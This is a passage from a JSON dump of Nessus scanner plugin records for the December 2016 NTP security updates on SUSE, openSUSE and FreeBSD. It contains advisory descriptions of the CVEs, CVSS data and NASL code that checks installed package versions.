(bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 37, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-21T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2016:3195-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-21T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:ntp-doc", "p-cpe:/a:novell:suse_linux:ntp-debugsource", "p-cpe:/a:novell:suse_linux:ntp-debuginfo", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2016-3195-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95987", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3195-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95987);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : ntp (SUSE-SU-2016:3195-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues: ntp was updated to\n4.2.8p9. Security issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5219/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7426/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7427/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7428/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7429/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7431/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7433/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-7434/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9310/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9311/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163195-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c969855\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2016-1853=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2016-1853=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1853=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2016-1853=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1853=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T12:29:52", "description": "This update for ntp fixes the following issues :\n\nntp was updated to 4.2.8p9.\n\nSecurity issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\nNon-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-29T00:00:00", "title": "openSUSE Security Update : ntp (openSUSE-2016-1525)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:ntp"], "id": "OPENSUSE-2016-1525.NASL", "href": "https://www.tenable.com/plugins/nessus/96173", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1525.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96173);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2016-1525)\");\n script_summary(english:\"Check for the openSUSE-2016-1525 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\nntp was updated to 4.2.8p9.\n\nSecurity issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\nNon-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=992606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debuginfo-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debugsource-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-debuginfo-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-debugsource-4.2.8p9-27.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-debugsource\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T10:59:57", "description": "Multiple vulnerabilities have been discovered in the NTP suite :\n\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy of Cisco\nASIG.\n\nCVE-2016-9310: Mode 6 unauthenticated trap information disclosure and\nDDoS vector. Reported by Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS. Reported by\nMatthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS. Reported\nby Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass.\nReported by Sharon Goldberg and Aanchal Malhotra of Boston University.\n\nCVE-2016-7434: NULL pointer dereference in\n_IO_str_init_static_internal(). Reported by Magnus Stubman.\n\nCVE-2016-7426: Client rate limiting and server responses. Reported by\nMiroslav Lichvar of Red Hat.\n\nCVE-2016-7433: Reboot sync calculation problem. Reported independently\nby Brian Utterback of Oracle, and by Sharon Goldberg and Aanchal\nMalhotra of Boston University. Impact : A remote attacker who can send\na specially crafted packet to cause a NULL pointer dereference that\nwill crash ntpd, resulting in a Denial of Service. [CVE-2016-9311]\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, 'restrict default noquery ...' is not specified,\na specially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring by an attacker from remote.\n[CVE-2016-9310]\n\nAn attacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n[CVE-2016-7427]\n\nAn attacker with access to the NTP broadcast domain can send specially\ncrafted broadcast mode NTP packets to the broadcast domain which,\nwhile being logged by ntpd, will cause ntpd to reject broadcast mode\npackets from legitimate NTP broadcast servers. [CVE-2016-7428]\n\nOrigin timestamp problems were fixed in ntp 4.2.8p6. However,\nsubsequent timestamp validation checks introduced a regression in the\nhandling of some Zero origin timestamp checks. [CVE-2016-7431]\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet. [CVE-2016-7434]\n\nAn attacker who knows the sources (e.g., from an IPv4 refid in server\nresponse) and knows the system is (mis)configured in this way can\nperiodically send packets with spoofed source address to keep the rate\nlimiting activated and prevent ntpd from accepting valid responses\nfrom its sources. [CVE-2016-7426]\n\nNtp Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. The calculations and formulas have been\nreviewed and reconciled, and the code has been updated accordingly.\n[CVE-2016-7433]", "edition": 35, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-27T00:00:00", "title": "FreeBSD : FreeBSD -- Multiple vulnerabilities of ntp (fcedcdbb-c86e-11e6-b1cf-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:FreeBSD"], "id": "FREEBSD_PKG_FCEDCDBBC86E11E6B1CF14DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/96123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 